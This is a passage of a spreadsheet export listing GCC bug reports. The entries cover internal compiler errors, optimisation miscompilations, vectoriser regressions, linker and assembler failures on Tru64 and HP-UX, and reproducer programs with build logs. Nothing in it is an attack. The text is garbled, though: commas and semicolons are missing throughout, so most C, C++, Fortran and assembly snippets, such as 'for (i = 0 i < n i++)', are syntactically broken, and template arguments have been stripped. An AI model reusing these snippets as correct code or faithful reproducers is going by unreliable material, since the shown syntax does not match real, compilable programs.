0x000000000048099e :  lea    0x1(%rdx)%esi
0x00000000004809a1 :  cmp    $0x9%cl
0x00000000004809a4 :  cmovne %edx%esi
0x00000000004809a7 :  cmove  %esi%edx
0x00000000004809aa :  setne  %cl
0x00000000004809ad :  movzbl %cl%ecx
0x00000000004809b0 :  lea    0x1(%rax%rcx2)%rax
0x00000000004809b5 :  cmp    %rax%rdi
0x00000000004809b8 :  jg     0x480991 
-------------------------------------
Extract of the correct output (-O1):
----
addrmap[0]=0
addrmap[3]=3
addrmap[4]=4
addrmap[7]=7
addrmap[10]=10
addrmap[13]=13
addrmap[16]=16
addrmap[19]=19
addrmap[22]=22
addrmap[23]=22
----
With -O1 -ftree-vectorize only addrmap[0] and addrmap[3] are correct:
----
addrmap[0]=0
addrmap[3]=3
addrmap[4]=0
addrmap[7]=32767
addrmap[10]=16777216
addrmap[13]=0
addrmap[16]=469314288
addrmap[19]=32767
addrmap[22]=469315151
addrmap[23]=32767
----
See also:
http://bugs.python.org/issue9880
My setup:
 * Intel(R) Pentium(R) 4 CPU 3.00GHz
 * Debian Sid
 * gcc (Debian 20110106-1) 4.6.0 20110106 (experimental) [trunk revision
168538] 
 * Python 3.2 (r87949)</t>
  </si>
  <si>
    <t>GCC-80403</t>
  </si>
  <si>
    <t>UBSAN: compile time crash with type mismatch in binary expression message in / and % expr</t>
  </si>
  <si>
    <t>gcc x86_64 top of the trunk with patch from 80349. This seems related but different.
&gt; cat f.cpp
unsigned foo() {
   unsigned a = unsigned(!(6044238 &gt;&gt; 0) &gt;= (0 &lt; 0)) % 0
   unsigned b = unsigned(!(6044238 &gt;&gt; 0) &gt;= (0 &lt; 0)) / 0
   return a+b
}
&gt; g++ -fsanitize=undefined -w -O0 -c f.cpp
f.cpp: In function â€˜unsigned int foo()â€™:
f.cpp:1:10: error: type mismatch in binary expression
 unsigned foo() {
          ^~~
unsigned int
int
unsigned int
a = 1 % 0
f.cpp:1:10: error: type mismatch in binary expression
unsigned int
int
unsigned int
b = 1 / 0
f.cpp:1:10: internal compiler error: verify_gimple failed</t>
  </si>
  <si>
    <t>GCC-35639</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 Regression] -fprofile-generate = huge SCCs for PRE</t>
  </si>
  <si>
    <t>The attached .i file (from sed) spends 50% of its compilation time on PRE with -fprofile-generate -O2.</t>
  </si>
  <si>
    <t>GCC-14692</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in canon_condition</t>
  </si>
  <si>
    <t>GNU C version 3.5-tree-ssa 20040318 (merged 20040307)
% cat test.c
void assert_failed (void)           
void eidecpos_1 (unsigned char *pos long n)
{
  int i
  for (i = 0 i &lt; n i++)
    {
      const unsigned char *dc_ptr1 = pos
      pos--
      if (dc_ptr1 - pos == 1)
        assert_failed ()
    }
}
% gcc -c -O3 test.c
test.c: In function `eidecpos_1':             
test.c:12: internal compiler error: in canon_condition at loop-iv.c:1413
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Does not occur at -O2.</t>
  </si>
  <si>
    <t>GCC-46297</t>
  </si>
  <si>
    <t>[4.6 Regression] gfortran.dg/g77/980701-0.f FAILs with -Os -fno-asynchronous-unwind-tables</t>
  </si>
  <si>
    <t>Output:
$ gfortran -Os -fno-asynchronous-unwind-tables 980701-0.f
$ ./a.out 
Aborted
valgrind output:
$ gfortran -Os -fno-asynchronous-unwind-tables 980701-0.f -g
$ valgrind -q ./a.out 
==3171== Conditional jump or move depends on uninitialised value(s)
==3171==    at 0x40078C: x_ (980701-0.f:67)
==3171== 
==3171== Conditional jump or move depends on uninitialised value(s)
==3171==    at 0x40078E: x_ (980701-0.f:67)
==3171== 
Aborted
The warning is for these instructions:
  400781:       f3 0f 10 00             movss  (%rax)%xmm0
  400785:       0f 2e 05 7c 02 00 00    ucomiss 0x27c(%rip)%xmm0        # 400a08 
  40078c:       7a 41                   jp     4007cf 
  40078e:       75 3f                   jne    4007cf 
Tested revisions:
r166272 - fail
r163636 - fail
r161659 - OK
4.5 r165781 - OK</t>
  </si>
  <si>
    <t>GCC-1267</t>
  </si>
  <si>
    <t>Innerclass cannot access protected method declared in foreign-package superclass of parent</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;feedback
State-Changed-Why: Thanks for the report. I attached a patch.
</t>
  </si>
  <si>
    <t>GCC-16858</t>
  </si>
  <si>
    <t>Linking of jv-convert fails with redundant pthreads symbols</t>
  </si>
  <si>
    <t>Bootstrapping GCC 3.4.1 on a Tru64 box (with a manual workaround to Bug 16300).
Everything hums along fine until this point:
----BEGIN BUILD LOG EXCERPT----
gmake[3]: Entering directory `/mnt/scratch/gcc-3.4.1/alphaev56-dec-osf4.0g/libjava'
/bin/sh ./libtool --tag=GCJ --mode=link /mnt/scratch/gcc-3.4.1/gcc/gcj
-B/mnt/scratch/gcc-3.4.1/alphaev56-dec-osf4.0g/libjava/
-B/mnt/scratch/gcc-3.4.1/gcc/
-L/mnt/scratch/gcc-3.4.1/alphaev56-dec-osf4.0g/libjava -mieee -g -O2  -o
jv-convert --main=gnu.gcj.convert.Convert -rpath /mnt/freeport/arch/tru64/lib
-shared-libgcc   -L/mnt/scratch/gcc-3.4.1/alphaev56-dec-osf4.0g/libjava/.libs
libgcj.la
/mnt/scratch/gcc-3.4.1/gcc/gcj
-B/mnt/scratch/gcc-3.4.1/alphaev56-dec-osf4.0g/libjava/
-B/mnt/scratch/gcc-3.4.1/gcc/ -mieee -g -O2 -o jv-convert
--main=gnu.gcj.convert.Convert -shared-libgcc 
-L/mnt/scratch/gcc-3.4.1/alphaev56-dec-osf4.0g/libjava
-L/mnt/scratch/gcc-3.4.1/alphaev56-dec-osf4.0g/libjava/.libs ./.libs/libgcj.a
-L/mnt/scratch/gcc-3.4.1/alphaev56-dec-osf4.0g/libstdc++-v3/src
-L/mnt/scratch/gcc-3.4.1/alphaev56-dec-osf4.0g/libstdc++-v3/src/.libs -lpthread
-lrt -L/mnt/scratch/gcc-3.4.1/gcc -L/usr/lib/cmplrs/cc
-L/mnt/freeport/arch/tru64/lib -lgcc -lc -lgcc -Wl-rpath
-Wl/mnt/freeport/arch/tru64/lib
/usr/bin/ld:
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): pthread_key_create: multiply
defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): __pthread_getspecific:
multiply defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): __pthread_setspecific:
multiply defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): __pthread_mutex_lock:
multiply defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): __pthread_mutex_unlock:
multiply defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): __pthread_create: multiply
defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): __pthread_cond_destroy:
multiply defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): __pthread_cond_init: multiply
defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): __pthread_cond_signal:
multiply defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): __pthread_cond_wait: multiply
defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): __pthread_mutex_init:
multiply defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): __pthread_mutex_destroy:
multiply defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): __pthread_self: multiply defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): pthread_attr_destroy:
multiply defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): pthread_attr_init: multiply
defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): pthread_attr_setdetachstate:
multiply defined
/mnt/scratch/gcc-3.4.1/gcc/libgcc.a(gthr-posix.o): pthread_setschedparam:
multiply defined
collect2: ld returned 1 exit status
gmake[3]: *** [jv-convert] Error 1
gmake[3]: Leaving directory `/mnt/scratch/gcc-3.4.1/alphaev56-dec-osf4.0g/libjava'
gmake[2]: *** [all-recursive] Error 1
gmake[2]: Leaving directory `/mnt/scratch/gcc-3.4.1/alphaev56-dec-osf4.0g/libjava'
gmake[1]: *** [all-target-libjava] Error 2
gmake[1]: Leaving directory `/mnt/scratch/gcc-3.4.1'
gmake: *** [bootstrap-lean] Error 2
+ exit 1
----END BUILD LOG EXCERPT----</t>
  </si>
  <si>
    <t>GCC-30482</t>
  </si>
  <si>
    <t xml:space="preserve"> division by 0</t>
  </si>
  <si>
    <t>http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=221319
raises a question whether:
std::complex (1.0 1.0) / 0.0
and
std::complex (1.0 1.0) / std::complex (0.0 0.0)
can or can't be NaN.  In C say:
#define I (__extension__ 1.0iF)
_Complex double d = 1.0 + 0.0 * I e f z = 0.0 + 0.0 * I
int
main (void)
{
  e = d / 0.0
  f = d / z
  __builtin_printf (%g %g %g %g\n __real__ e __imag__ e __real__ f __imag__ f)
  return 0
}
in -std=c99 always prints inf (where complex inf is even when just one of the parts is inf) no matter what optimization options in C89 the first division
when optimizing is usually optimized into the simpler __real__ d / 0.0 __imag__ d / 0.0 division and thus gives inf too but the latter and when not optimizing
even the first one gives NaN.
What do we want in C++?  C++ doesn't use flag_complex_method = 2 so unless
that changes only the division by double (rather than std::complex )
could generally (when not optimizing) return inf - with a help in the specialization see the above URL.</t>
  </si>
  <si>
    <t>GCC-1785</t>
  </si>
  <si>
    <t xml:space="preserve">	Internal Compiler Error when compiling Linux kernel 2.4.0-ac6 or
	later. (Linux kernel 2.4.0-ac4 seems to work ok as do versions of
	egcs in CVS prior to about 1 week ago.)
	Error is: irq.c:68: Internal compiler error in process_init_element at c-typeck.c:6696
	Command line causing failure: gcc -D__KERNEL__ -I/usr/src/linux/include -Wall -Wstrict-prototypes -O2 -fomit-frame-pointer -fno-strict-aliasing -pipe -mpreferred-stack-boundary=2 -march=k6 -c -o irq.o irq.c
	The file is located in the arch/i386/kernel directory of the Linux kernel.
Release:
unknown
How-To-Repeat:
	Compile Linux Kernel 2.4.0-ac11 with egcs-2.97 20010126 on an AMD K6. The section of code that fails seems to be relatively independent of the kernel configuration.
Unformatted:
 configured with: ../configure --prefix=/usr/local/egcs --enable-threads --enable-shared --enable-cpp : (reconfigured)</t>
  </si>
  <si>
    <t>jcday</t>
  </si>
  <si>
    <t>GCC-64682</t>
  </si>
  <si>
    <t>[5 Regression] wrong code at -O2 and -O3 on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The current gcc trunk miscompiles the following code on x86_64-linux at -O2 and -O3 in both 32-bit and 64-bit modes. 
This is a regression from 4.9.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/5.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 5.0.0 20150119 (experimental) [trunk revision 219832] (GCC) 
$ 
$ gcc-trunk -Os small.c a.out
5
$ gcc-4.9 -O2 small.c a.out
5
$ 
$ gcc-trunk -O2 small.c a.out
1
$ 
-----------------------------------
int printf (const char * ...)
int a b = 1
int
main ()
{
  int i
  for (i = 0 i &lt; 56 i++)
    for ( a a--)
  int *c = 
  if (*c)
    *c = 1 % (unsigned int) *c | 5
  printf (%d\n b)
  return 0
}</t>
  </si>
  <si>
    <t>GCC-8596</t>
  </si>
  <si>
    <t>parser: Base class template list not checked at point of declaration</t>
  </si>
  <si>
    <t>In playing with PR 3907 I found that this compiles:
------------------------------
template  struct U {}
template  struct C : U{}
------------------------------
Is this supposed to work? I could not find anything in
the standard but I'm surprised it compiles cleanly.
Of course I cannot instantiate C since zs_zs_zs is not
known.
Further playing tells me that this has something to do
with (the non-existence of)two-stage name lookup since
this compiles:
--------------------------
template  struct U {}
template  struct C : U{}
const int zs_zs_zs = 3
C c1
--------------------------
Release:
unknown
Environment:
3.3 CVS and 3.2.1 pre</t>
  </si>
  <si>
    <t>GCC-40595</t>
  </si>
  <si>
    <t>[C++0x] ICE trying to use sfinae with variadic template pack expansion</t>
  </si>
  <si>
    <t>template
struct S
{
    typedef int type
}
template
struct Get
{
    static T get()
}
#ifdef BUG
# define ELLIPSIS ...
#else
# define ELLIPSIS
#endif
template
struct B
{
    template
        typename S::get() (Get::get() ELLIPSIS) )&gt;::type
        f(Args
}
struct X
{
    bool operator()(int) const
}
int main()
{
    B b
    b.f(1)
} 
jwakely@gcc16:~/src/tests$ g++ -std=c++0x  -c pr.cc 
jwakely@gcc16:~/src/tests$ g++ -std=c++0x  -c pr.cc  -DBUG
pr.cc: In instantiation of â€˜Bâ€™:
pr.cc:35:10:   instantiated from here
pr.cc:25:9: internal compiler error: in tsubst at cp/pt.c:9733
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The code compiles fine with a single template parameter but not with a parameter pack of size one.
I'm trying to use SFINAE to disable overloads when a function call expression is invalid which is needed to implement std::bind for C++0x</t>
  </si>
  <si>
    <t>jwakely.gcc</t>
  </si>
  <si>
    <t>GCC-29225</t>
  </si>
  <si>
    <t>[4.2 regression] ICE in gimplify_expr at gimplify.c:4513</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/388626]
Attached preprocessed source. removing the template op&lt; near the end
(introduced to find the types of lhs and rhs in the error message that
results) makes the ICE go away.
$ g++ -c 388263.ii 
/home/marc/KDAB/CVS/SWG/trinav/ascshared/util/stl_util.h: In member function 'bool stl_util::less_member_2_m::operator()(const boost::shared_ptr&amp; const R_alt&amp;) const [with R_alt = AscShared::GuiModel::AttributeDescriptor T = ComputedAttribute R = AscShared::GuiModel::AttributeDescriptor ()()const]':
/usr/lib/gcc/i486-linux-gnu/4.1.2/../../../../include/c++/4.1.2/bits/stl_algo.h:2845:   instantiated from '_ForwardIterator std::lower_bound(_ForwardIterator _ForwardIterator const _Tp&amp; _Compare) [with _ForwardIterator = __gnu_cxx::__normal_iterator* std::vector std::allocator &gt; &gt; &gt; _Tp = AscShared::GuiModel::AttributeDescriptor _Compare = stl_util::less_member_2_m]'
object.cpp:81:   instantiated from here
/home/marc/KDAB/CVS/SWG/trinav/ascshared/util/stl_util.h:181: internal compiler error: in gimplify_expr at gimplify.c:4513
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-18495</t>
  </si>
  <si>
    <t>[4.0 only] Intrinisc function SPREAD is broken</t>
  </si>
  <si>
    <t>Detected a fault in the fortran 90 version of the LLNL mflops test.  SPREAD 
is causing a segmentation fault in KERNEL 21. Replacing this section with 
the fortran77 kernel corrects the fault (BTW will report the benchmarks on the 
gfortran wiki - they do not look too bad at all!).  The fault is caused by:
      DO K = 1 25
           PX(::N) = PX(::N) + SPREAD(VY(:25K)DIM = 2NCOPIES = N)* &amp;
     &amp;          SPREAD(CX(K:N)DIM = 1NCOPIES = 25)
      END DO
where N is 1000
The following codelet gives incorrect results for small N and also segment 
faults for large enough N (eg 1000 as here):
program test_spread
   implicit none
   integer parameter :: N = 1000
   integer            :: I
   integer dimension(N) :: source 
   integer dimension(NN) :: sink
   do i = 1  N
      source(i) = N
   end do
   print *'product'
   sink = spread( source  1  N ) * spread( source  N  N )
   print * sink
   stop
end program test_spread</t>
  </si>
  <si>
    <t>GCC-38930</t>
  </si>
  <si>
    <t>[4.4 Regression]  typedef with attribute mode causes ICE in dwarf2</t>
  </si>
  <si>
    <t>Revision 143546:
http://gcc.gnu.org/ml/gcc-patches/2009-01/msg00940.html
causes
In file included from ../../../../src-trunk/libjava/gij.cc:11:
../../../../src-trunk/libjava/include/jvm.h:260: internal compiler error: in gen_typedef_die at dwarf2out.c:14665
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[8]: *** [gij.lo] Error 1
Revision 143543 is OK. Gcc is configured with
--enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld</t>
  </si>
  <si>
    <t>GCC-34879</t>
  </si>
  <si>
    <t>__builtin_setjmp / __builtin_longjmp fails stack frame address with O2 O3 and Os</t>
  </si>
  <si>
    <t>The test case is gcc.c-torture/execute/built-in-setjmp.c.
The __builtin_setjmp stores Y+1 in the setjmp buffer. With -O0 the first
instruction after the jmp does a sbiw r28 1 that restores the
original value but for some reason with higher optimization levels
this instruction is optimized away leaving R28 pointing to the wrong
address by one.
The __builtin_setjmp code:
  if (__builtin_setjmp (buf))
16a:	ce 01       	movw	r24 r28
16c:	01 96       	adiw	r24 0x01	 1
  Notice the increment here before storing R28
16e:	90 93 07 01 	sts	0x0107 r25
172:	80 93 06 01 	sts	0x0106 r24
176:	8f ee       	ldi	r24 0xEF	 239
178:	90 e0       	ldi	r25 0x00	 0
17a:	90 93 09 01 	sts	0x0109 r25
17e:	80 93 08 01 	sts	0x0108 r24
182:	ed b7       	in	r30 0x3d	 61
184:	fe b7       	in	r31 0x3e	 62
186:	f0 93 0b 01 	sts	0x010B r31
18a:	e0 93 0a 01 	sts	0x010A r30
The __builtin_longjmp code:
  __builtin_longjmp (buf 1)
10c:	e0 91 08 01 	lds	r30 0x0108
110:	f0 91 09 01 	lds	r31 0x0109
114:	c0 91 06 01 	lds	r28 0x0106
118:	d0 91 07 01 	lds	r29 0x0107
11c:	80 91 0a 01 	lds	r24 0x010A
120:	90 91 0b 01 	lds	r25 0x010B
no decrement R28 is used as is.</t>
  </si>
  <si>
    <t>pmarques</t>
  </si>
  <si>
    <t>GCC-867</t>
  </si>
  <si>
    <t>g++ does not compile qt library's kernel/moc_qnetworkprotocol.cpp</t>
  </si>
  <si>
    <t>The following command triggers the problem:
 g++ -c -I. -D_POSIX_SOURCE -D_OSF_SOURCE -D_AES_SOURCE -O2 -fPIC
-DQT_BUILTIN_GIF_READER=0 -DQT_NO_IMAGEIO_JPEG -DQT_NO_IMAGEIO_MNG
-DQT_NO_SM_SUPPORT -o moc_qnetworkprotocol.o moc_qnetworkprotocol.cpp
Error output:
moc_qnetworkprotocol.cpp: In function `static class QMetaObject *
QNetworkProtocol::staticMetaObject()': moc_qnetworkprotocol.cpp:141: Internal
compiler error in `gen_reload_inhi' at insn-emit.c:5550 Please submit a full
bug report. See  for
instructions.
I have attached a bzipped tar file which includes all necessary headers
and the .ii file
The problem does not occur with Intel Linux.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
# uname -a 
OSF1 xxx V4.0 1091 alpha 
EV67 and EV56
OSF 4.0E + F</t>
  </si>
  <si>
    <t>thomas.soddemann</t>
  </si>
  <si>
    <t>GCC-49746</t>
  </si>
  <si>
    <t>Generated PA-RISC2.0w code cannot be assembled by GNU as-2.21.1</t>
  </si>
  <si>
    <t>using
gcc (GCC) 3.4.6
GNU assembler (GNU Binutils) 2.21.1
GNU ld (GNU Binutils) 2.21.1
gmp-5.0.2
mpfr-3.0.1
mpc-0.8.2
to build a 64bit GNU gcc 4.6.1 on HP-UX 11.11 (PA-RISC 2.0w)
export ABI=2.0w
export SHELL=/pro/local/bin/bash
export PREFIX=/usr/local/pa20_64
export CONFIG_SITE=
export CC=gcc64
export CFLAGS=-mpa-risc-2-0 -fPIC
export CXXFLAGS=-mpa-risc-2-0 -fPIC
../src/configure \
    --enable-languages=cc++ \
    --prefix=$PREFIX --with-local-prefix=$PREFIX \
    --with-gnu-as    --with-as=$PREFIX/bin/as \
    --without-gnu-ld --with-ld=/usr/ccs/bin/ld \
    --with-gmp=$PREFIX \
    --with-mpfr=$PREFIX \
    --disable-shared \
    --disable-nls \
    --host=hppa64-hp-hpux11.11
make
:
:
gcc64 -c   -g -fkeep-inline-functions -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -Wold-style-definition -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../src/gcc -I../../src/gcc/. -I../../src/gcc/../include -I../../src/gcc/../libcpp/include -I/usr/local/pa20_64/include -I/usr/local/pa20_64/include  -I../../src/gcc/../libdecnumber -I../../src/gcc/../libdecnumber/dpd -I../libdecnumber   -I/usr/local/pa20_64/include ../../src/gcc/graphite-clast-to-gimple.c -o graphite-clast-to-gimple.o
/tmp/ccPcqVug.s: Assembler messages:
/tmp/ccPcqVug.s:137659: Error: Field out of range [-262144..262143] (322212).
/tmp/ccPcqVug.s:137661: Error: Field out of range [-262144..262143] (322828).
/tmp/ccPcqVug.s:137663: Error: Field out of range [-262144..262143] (322820).
/tmp/ccPcqVug.s:137665: Error: Field out of range [-262144..262143] (322812).
:
:
/tmp/ccPcqVug.s:137855: Error: Field out of range [-262144..262143] (322052).
/tmp/ccPcqVug.s:137857: Error: Field out of range [-262144..262143] (322044).
/tmp/ccPcqVug.s:137859: Error: Field out of range [-262144..262143] (322036).
make[3]: *** [fold-const.o] Error 1
make[3]: *** Waiting for unfinished jobs....
make[3]: Leaving directory `/pro/3gl/GNU/gcc/obj-64/gcc'</t>
  </si>
  <si>
    <t>h.m.brand</t>
  </si>
  <si>
    <t>GCC-55391</t>
  </si>
  <si>
    <t>[4.8 regression] ICE in adjust_address_1 at emit-rtl.c:2180 breaks bulding cross to sparc64-linux</t>
  </si>
  <si>
    <t>Attempting to build gcc-4.8-20121118 as a cross from x86_64-linux to sparc64-linux fails with:
libtool: compile:  /mnt/scratch/objdir/./gcc/g++ -B/mnt/scratch/objdir/./gcc/ -nostdinc++ -nostdinc++ -I/mnt/scratch/objdir/sparc64-unknown-linux/libstdc++-v3/include/sparc64-unknown-linux -I/mnt/scratch/objdir/sparc64-unknown-linux/libstdc++-v3/include -I/mnt/scratch/gcc-4.8-20121118/libstdc++-v3/libsupc++ -I/mnt/scratch/gcc-4.8-20121118/libstdc++-v3/include/backward -I/mnt/scratch/gcc-4.8-20121118/libstdc++-v3/testsuite/util -L/mnt/scratch/objdir/sparc64-unknown-linux/libstdc++-v3/src -L/mnt/scratch/objdir/sparc64-unknown-linux/libstdc++-v3/src/.libs -B/home/mikpe/pkgs/linux-x86_64/cross-sparc64/sparc64-unknown-linux/bin/ -B/home/mikpe/pkgs/linux-x86_64/cross-sparc64/sparc64-unknown-linux/lib/ -isystem /home/mikpe/pkgs/linux-x86_64/cross-sparc64/sparc64-unknown-linux/include -isystem /home/mikpe/pkgs/linux-x86_64/cross-sparc64/sparc64-unknown-linux/sys-include -DHAVE_CONFIG_H -I. -I/mnt/scratch/gcc-4.8-20121118/libitm -I/mnt/scratch/gcc-4.8-20121118/libitm/config/linux/sparc -I/mnt/scratch/gcc-4.8-20121118/libitm/config/linux -I/mnt/scratch/gcc-4.8-20121118/libitm/config/sparc -I/mnt/scratch/gcc-4.8-20121118/libitm/config/posix -I/mnt/scratch/gcc-4.8-20121118/libitm/config/generic -I/mnt/scratch/gcc-4.8-20121118/libitm -ftls-model=initial-exec -Wall -pthread -Werror -std=gnu++0x -funwind-tables -fno-exceptions -fno-rtti -fabi-version=4 -g -O2 -D_GNU_SOURCE -MT method-serial.lo -MD -MP -MF .deps/method-serial.Tpo -c /mnt/scratch/gcc-4.8-20121118/libitm/method-serial.cc -o method-serial.o
In file included from /mnt/scratch/gcc-4.8-20121118/libitm/libitm_i.h:87:0
                 from /mnt/scratch/gcc-4.8-20121118/libitm/method-serial.cc:25:
/mnt/scratch/gcc-4.8-20121118/libitm/method-serial.cc: In member function 'virtual _ITM_TYPE_CE {anonymous}::serialirr_dispatch::ITM_RCE(const _ITM_TYPE_CE*)':
/mnt/scratch/gcc-4.8-20121118/libitm/dispatch.h:37:41: internal compiler error: in adjust_address_1 at emit-rtl.c:2180
     return load(ptr abi_dispatch::LSMOD)                                  \
                                         ^
(long stack dump omitted)
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[4]: *** [method-serial.lo] Error 1
make[4]: Leaving directory `/mnt/scratch/objdir/sparc64-unknown-linux/libitm'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/mnt/scratch/objdir/sparc64-unknown-linux/libitm'
make[2]: *** [all] Error 2
make[2]: Leaving directory `/mnt/scratch/objdir/sparc64-unknown-linux/libitm'
make[1]: *** [all-target-libitm] Error 2
make[1]: Leaving directory `/mnt/scratch/objdir'
make: *** [all] Error 2
Found while checking to see if the native ICE reported in PR55388 could be reproduced with a cross.  Disabling libitm allows the build to complete.  (I also had to disable libsanitizer to work around a build error there.)
Starting a bisection...</t>
  </si>
  <si>
    <t>GCC-58556</t>
  </si>
  <si>
    <t>[4.9 Regression] gen-vect-26.c / gen-vect-28.c regression merging from r202839 to r202981</t>
  </si>
  <si>
    <t>Created attachment 30921
gen-vect-26.c.114t.vect dump file
I just merged in trunk from https://github.com/mirrors/gcc.git and I see
four new failures (in just four days):
82870c82883
&lt; PASS: gcc.dg/tree-ssa/gen-vect-26.c scan-tree-dump-times vect vectorized 1 lo
ops 1
---
&gt; FAIL: gcc.dg/tree-ssa/gen-vect-26.c scan-tree-dump-times vect vectorized 1 loops 1
82872c82885
&lt; PASS: gcc.dg/tree-ssa/gen-vect-26.c scan-tree-dump-times vect Alignment of access forced using peeling 1
---
&gt; FAIL: gcc.dg/tree-ssa/gen-vect-26.c scan-tree-dump-times vect Alignment of access forced using peeling 1
82875c82888
&lt; PASS: gcc.dg/tree-ssa/gen-vect-28.c scan-tree-dump-times vect vectorized 1 loops 1
---
&gt; FAIL: gcc.dg/tree-ssa/gen-vect-28.c scan-tree-dump-times vect vectorized 1 loops 1
82877c82890
&lt; PASS: gcc.dg/tree-ssa/gen-vect-28.c scan-tree-dump-times vect Alignment of access forced using peeling 1
---
&gt; FAIL: gcc.dg/tree-ssa/gen-vect-28.c scan-tree-dump-times vect Alignment of access forced using peeling 1</t>
  </si>
  <si>
    <t>GCC-69452</t>
  </si>
  <si>
    <t>[6 Regression] gcc ICE at -O3 on x86_64-linux-gnu in with verify_ssa failed</t>
  </si>
  <si>
    <t>The following valid code causes an ICE when compiled with the current gcc trunk at only -O3 on x86_64-linux-gnu in both 32-bit and 64-bit modes. The other optimization levels work just fine.
Unlike PR69341 it does not depend on the graphite loop transformation infrastructure.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/home/absozero/trunk/root-gcc/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc/configure --prefix=/home/absozero/trunk/root-gcc --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20160123 (experimental) [trunk revision 232764] (GCC)
$ gcc-trunk -O3 abc.c
abc.c: In function 'fn2':
abc.c:9:6: error: definition in block 42 follows the use
 void fn2() {
      ^~~
for SSA_NAME: _93 in statement:
c_lsm.20_116 = r_75 != 0 ? _93 : _71
abc.c:9:6: internal compiler error: verify_ssa failed
0xd55112 verify_ssa(bool bool)
	../../gcc/gcc/tree-ssa.c:1039
0xa9037d execute_function_todo
	../../gcc/gcc/passes.c:1965
0xa90bfb execute_todo
	../../gcc/gcc/passes.c:2010
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”â€”
$ cat abc.c
short a f h
struct S0 {
  int f0
} b
char c d e j k
int g
char fn1(char p1 int p2) { return 7 &gt;&gt; p2 ? p1 : p2 }
void fn2() {
  int l m n
  struct S0 o = {0}
  for () {
    int p = 1 r = e
    unsigned q = 6
    l = r == 0 ? q : q % r
    n = l
    c = f
    k = fn1(p n ^ e)
    char s = k
    j = s / 6
    if (j) {
      int t = d u = m = d ? t : t / d
      h = a || u
      b.f0 = h
      for ( d)
    } else {
      b = o
      if (d != g)
        for ()
    }
  }
}
int main() {}</t>
  </si>
  <si>
    <t>GCC-48237</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] ICE: in final_scan_insn at final.c:2651 with -fselective-scheduling2 -mtune=core2</t>
  </si>
  <si>
    <t>Created attachment 23750
reduced testcase
Compiler output:
$ gcc -O -fcaller-saves -fschedule-insns2 -fselective-scheduling2 -mtune=core2 testcase.c
testcase.c: In function 'foo':
testcase.c:19:1: internal compiler error: in final_scan_insn at final.c:2651
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The failing assert is:
#ifdef HAVE_ATTR_length
	    /* This instruction should have been split in shorten_branches
	       to ensure that we would have valid length info for the
	       splitees.  */
	    gcc_unreachable ()
#endif
Tested revisions:
r171265 - crash
4.6 r170955 - crash
4.5 r170955 - OK</t>
  </si>
  <si>
    <t>GCC-5280</t>
  </si>
  <si>
    <t>Problems with named locales and iostreams (gnulocale)</t>
  </si>
  <si>
    <t>After updating my system libc I tried name locales again. They no longer
crash but the call to the default named locale does only partly work. For
example consider the following code tl.C. Doubles are output
according to the default locale the locale employed for input is read
in by the program. When LANG is set to C everything works as
expected. Doubles separated with a comma as decimal point are
transformed into doubles with a dot as a separator. 
LANG=C ./tl 
de_DE
cout locale: C
cin locale: de_DE
12
1.2
13
1.3 
^D pressed
Unfortunately when LANG is set to de_DE this does no longer work. The
comma is a not accepted as a valid separator as it should and the loop
terminates with an error. If I set LANG to a different value for
example fr_FR the same problem occurs.
LANG=de_DE ./tl
de_DE
cout locale: de_DE
cin locale: de_DE
13
Release:
3.1 20011229 (experimental)
Environment:
